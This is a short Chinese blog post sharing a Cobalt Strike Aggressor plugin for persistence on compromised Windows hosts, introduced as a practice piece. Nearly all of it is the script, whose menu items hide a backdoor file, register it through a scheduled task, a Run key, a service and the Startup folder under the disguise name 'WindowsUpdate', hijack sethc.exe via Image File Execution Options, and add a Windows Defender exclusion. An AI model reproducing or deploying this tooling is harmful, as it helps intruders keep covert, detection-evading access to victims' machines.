自嘲:今天打開博客園一看,好家伙我竟然還有賬戶,原來我注冊了博客園啊。
CobaltStrike插件-權限維持模塊
方法都是網上常見的,正好在學怎么寫插件,練手之作,大佬勿噴。
popup beacon_bottom {
menu "權限維持" {
item "設置后門文件路徑" {
local('$bid');
foreach $bid ($1){
prompt_text("filePath", $filePath, {
$filePath = $1;
return $filePath;
});
}
}
item "隱藏文件" {
local('$bid');
foreach $bid ($1){
bshell($1, "attrib \"$filePath\" +s +h");
}
}
item "定時任務" {
local('$bid');
foreach $bid ($1){
bshell($1, "schtasks /create /tn WindowsUpdate /tr \"$filePath\" /sc minute /mo 1");
}
}
item "注冊表"{
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"$filePath\" /f");
}
}
item "SC服務"{
local('$bid');
foreach $bid ($1){
bshell($1, "sc create \"WindowsUpdate\" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"WindowsUpdate\" start= auto&&net start WindowsUpdate");
}
}
item "自啟動目錄"{
local('$bid');
foreach $bid ($1){
bshell($1, "copy \"$filePath\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" /y");
bshell($1, "attrib \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" +s +h");
}
}
item "映像劫持"{
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Sethc.exe /f");
bshell($1, "reg add HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Sethc.exe /v Debugger /t REG_SZ /d \"C:\Users\Administrator\Desktop\artifact.exe\" /f");
bshell($1, "schtasks /create /tn WindowsUpdate /tr C:\Windows\System32\sethc.exe /sc minute /mo 1");
}
}
item "添加Defend排除項"{
local('$bid');
foreach $bid ($1){
bpoershell($1, "Set-MpPreference -ExclusionPath \"$filePath\" ");
}
}
}
}